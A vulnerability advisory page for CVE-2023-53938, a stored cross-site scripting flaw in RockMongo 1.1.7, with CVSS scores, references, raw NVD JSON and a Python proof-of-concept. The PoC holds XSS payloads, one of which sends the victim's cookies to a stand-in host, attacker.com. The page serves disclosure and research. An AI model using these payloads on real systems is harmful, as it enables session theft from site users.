Security Vulnerability Report
CVE-2023-53938 CVSS 5.4 MEDIUM


Published: 2025-12-18 20:15:52
Last Modified: 2025-12-31 17:20:39

Description

RockMongo 1.1.7 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through multiple unencoded input parameters. Attackers can exploit the vulnerability by submitting crafted payloads in the database, collection, and login parameters to execute arbitrary JavaScript in the victim's browser.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Weakness
CWE-79

Configurations (Affected Products)

cpe:2.3:a:rockmongo:rockmongo:1.1.7:*:*:*:*:*:*:* - VULNERABLE
RockMongo 1.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2023-53938 PoC - RockMongo 1.1.7 Stored XSS
# Target: RockMongo 1.1.7
# Vulnerability: Stored XSS via multiple unencoded input parameters

TARGET_URL = "http://target:port/rockmongo/index.php"
USERNAME = "admin"
PASSWORD = "admin"

# XSS Payloads for different parameters
PAYLOADS = {
    "database_name": "<script>alert(document.cookie)</script>",
    "collection_name": "<img src=x onerror=alert('XSS')>",
    "login_username": "<script>fetch('http://attacker.com/steal?c='+document.cookie)</script>",
}


def exploit_stored_xss():
    """
    This PoC demonstrates how to inject malicious scripts through RockMongo
    parameters. The injected scripts will be stored and executed when other
    users view the affected pages.
    """
    session = requests.Session()

    # Step 1: Login to RockMongo
    login_data = {
        "username": USERNAME,
        "password": PASSWORD,
        "login": 1,
    }

    # Inject XSS payload in login username field
    login_data["username"] = PAYLOADS["login_username"]

    try:
        # timeout added so the script does not hang on an unresponsive host
        response = session.post(TARGET_URL, data=login_data, timeout=10)
        print("[*] Payload sent via login parameter")
        print(f"[*] Payload: {PAYLOADS['login_username']}")
        print(f"[*] Status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        sys.exit(1)


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2023-53938 PoC - RockMongo Stored XSS")
    print("=" * 60)
    exploit_stored_xss()
```

References

https://github.com/iwind/rockmongo/ (Product)
https://www.exploit-db.com/exploits/51437 (Exploit, Third Party Advisory)
https://www.vulncheck.com/advisories/rockmongo-stored-cross-site-scripting-vulnerability-via-multiple-parameters (Third Party Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2023-53938", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:52.160", "lastModified": "2025-12-31T17:20:39.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RockMongo 1.1.7 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through multiple unencoded input parameters. Attackers can exploit the vulnerability by submitting crafted payloads in database, collection, and login parameters to execute arbitrary JavaScript in victim's browser."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rockmongo:rockmongo:1.1.7:*:*:*:*:*:*:*", "matchCriteriaId": "FB4D40D8-A769-4898-B413-C60D8B250569"}]}]}], "references": [{"url": "https://github.com/iwind/rockmongo/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51437", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/rockmongo-stored-cross-site-scripting-vulnerability-via-multiple-parameters", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51437", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
```